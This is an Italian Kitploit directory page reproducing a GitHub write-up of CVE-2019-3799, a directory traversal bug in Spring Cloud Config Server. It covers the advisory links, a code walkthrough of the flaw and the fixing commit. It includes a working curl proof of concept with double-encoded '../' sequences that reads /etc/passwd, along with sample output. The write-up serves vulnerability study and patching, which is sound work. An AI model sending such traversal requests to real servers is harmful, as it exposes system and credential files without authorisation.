Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-3799 — CVE-2019-3799 - Spring Cloud Config Server: Attraversamento di directory < 2.1.2, 2.0.4, 1.4.6 | Kitploit
Strumenti/GitHubGitHub/mpgn/cve-2019-3799
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubmpgn/cve-2019-3799

CVE-2019-3799

CVE-2019-3799 - Spring Cloud Config Server: Attraversamento di directory < 2.1.2, 2.0.4, 1.4.6

Vedi Repository
31547 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2019-3799 - Spring-Cloud-Config-Server: attraversamento di directory < 2.1.2, 2.0.4, 1.4.6

Spring Cloud Config Server è vulnerabile a un attacco di attraversamento di directory / attraversamento di percorso / divulgazione del contenuto di file < 2.1.2, 2.0.4, 1.4.6

Spring Cloud Config, versioni 2.1.x precedenti alla 2.1.2, versioni 2.0.x precedenti alla 2.0.4, versioni 1.4.x precedenti alla 1.4.6 e versioni precedenti non supportate consentono alle applicazioni di servire file di configurazione arbitrari tramite il modulo spring-cloud-config-server. Un utente malintenzionato, o un attaccante, può inviare una richiesta utilizzando un URL appositamente costruito che può portare a un attacco di attraversamento di directory.

capture d'écran_1

Trovato da Vern ([email protected])

Avviso di sicurezza

  • https://pivotal.io/security/cve-2019-3799
  • https://spring.io/blog/2019/04/17/cve-2019-3799-spring-cloud-config-2-1-2-2-0-4-1-4-6-released

Analisi tecnica

  • https://chybeta.github.io/2019/04/18/%E3%80%90CVE-2019-3799%E3%80%91-Directory-Traversal-with-spring-cloud-config-server/

Prova di concetto

  1. Scarica una versione vulnerabile di Spring Cloud Config https://github.com/spring-cloud/spring-cloud-config
  2. Esegui l'applicazione
cd spring-cloud-config-server                                                                                                                                                                     
../mvnw spring-boot:run
  1. Exploit
curl http://127.0.0.1:8888/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd                                                                                                    

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

La vulnerabilità

Come sempre, leggendo la documentazione possiamo trovare le informazioni rilevanti:

Servire file di testo semplice: https://cloud.spring.io/spring-cloud-static/spring-cloud-config/1.3.1.RELEASE/#_serving_plain_text

Il Config Server fornisce questi tramite un endpoint aggiuntivo all'indirizzo /{name}/{profile}/{label}/{path} dove "name", "profile" e "label" hanno lo stesso significato dell'endpoint ambiente regolare, ma "path" è un nome di file (ad es. log.xml).

Il Server fornisce questi tramite un endpoint aggiuntivo all'indirizzo /{name}/{profile}/{label}/{path}

Un'altra informazione interessante dalla documentazione:

Con backend basati su VCS (git, svn), i file vengono estratti o clonati nel filesystem locale. Di default vengono inseriti nella directory temporanea di sistema con un prefisso config-repo-. Su Linux, ad esempio, potrebbe essere /tmp/config-repo-

Cosa succede quando inviamo http://127.0.0.1:8888/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd

  1. La richiesta viene mappata con

https://github.com/spring-cloud/spring-cloud-config/blob/3c0348ca624f9f3b370797799a3608840fed2d8b/spring-cloud-config-server/src/main/java/org/springframework/cloud/config/server/resource/ResourceController.java#L71

@RequestMapping("/{name}/{profile}/{label}/**")
public String retrieve(@PathVariable String name, @PathVariable String profile,
    @PathVariable String label, ServletWebRequest request,
    @RequestParam(defaultValue = "true") boolean resolvePlaceholders)
    throws IOException {
  String path = getFilePath(request, name, profile, label);
  return retrieve(request, name, profile, label, path, resolvePlaceholders);
}
  1. La funzione retrieve chiama la funzione findOne

https://github.com/spring-cloud/spring-cloud-config/blob/3c0348ca624f9f3b370797799a3608840fed2d8b/spring-cloud-config-server/src/main/java/org/springframework/cloud/config/server/resource/ResourceController.java#L103

synchronized String retrieve(ServletWebRequest request, String name, String profile,
    String label, String path, boolean resolvePlaceholders) throws IOException {
  name = resolveName(name);
  label = resolveLabel(label);
  Resource resource = this.resourceRepository.findOne(name, profile, label, path); // path: ..%2f..%2f..%2f..%2f..%2f../etc/passwd
  if (checkNotModified(request, resource)) {
    // Content was not modified. Just return.
    return null;
  }
  // ensure InputStream will be closed to prevent file locks on Windows
  try (InputStream is = resource.getInputStream()) {
    String text = StreamUtils.copyToString(is, Charset.forName("UTF-8"));
    if (resolvePlaceholders) {
      Environment environment = this.environmentRepository.findOne(name,
          profile, label);
      text = resolvePlaceholders(prepareEnvironment(environment), text);
    }
    return text;
  }
}
  1. Viene chiamata la funzione findOne:
public synchronized Resource findOne(String application, String profile, String label, String path) {
  if (StringUtils.hasText(path)) {
    String[] locations = this.service.getLocations(application, profile, label).getLocations(); // /tmp/config-repo-<randomid>
    try {
      for (int i = locations.length; i-- > 0; ) {
        String location = locations[i]; // [1]..%2f..%2f..%2f..%2f..%2f../etc/passwd
        for (String local : getProfilePaths(profile, path)) {
            Resource file = this.resourceLoader.getResource(location).createRelative(local); // /tmp/config-repo-<randomid>/..%2f..%2f..%2f..%2f..%2f../etc/passwd
            if (file.exists() && file.isReadable()) {
                return file; // /tmp/config-repo-<randomid>/..%2f..%2f..%2f..%2f..%2f../etc/passwd
            }
          }
        }
      }
    }
    catch (IOException e) {
        throw new NoSuchResourceException(
                "Error : " + path + ". (" + e.getMessage() + ")");
    }
  }
  throw new NoSuchResourceException("Not found: " + path);
}
  1. Quindi la funzione retrieve legge il file con StreamUtils.copyToString(is, Charset.forName("UTF-8"), che converte /tmp/config-repo-<randomid>/..%2f..%2f..%2f..%2f..%2f../etc/passwd in /etc/passwd, portando alla divulgazione del file /etc/passwd

capture d'écran_4


Correzione: https://github.com/spring-cloud/spring-cloud-config/commit/3632fc6f64e567286c42c5a2f1b8142bfde505c2

capture d'écran

From 3632fc6f64e567286c42c5a2f1b8142bfde505c2 Mon Sep 17 00:00:00 2001
From: Spencer Gibb <[email protected]>
Date: Tue, 2 Apr 2019 14:16:10 -0400
Subject: [PATCH] Cleans invalid paths

fixes gh-1355
---
 .../resource/GenericResourceRepository.java   | 165 ++++++++++++++++--
 .../GenericResourceRepositoryTests.java       |  18 ++
 2 files changed, 170 insertions(+), 13 deletions(-)
Scarica lo strumento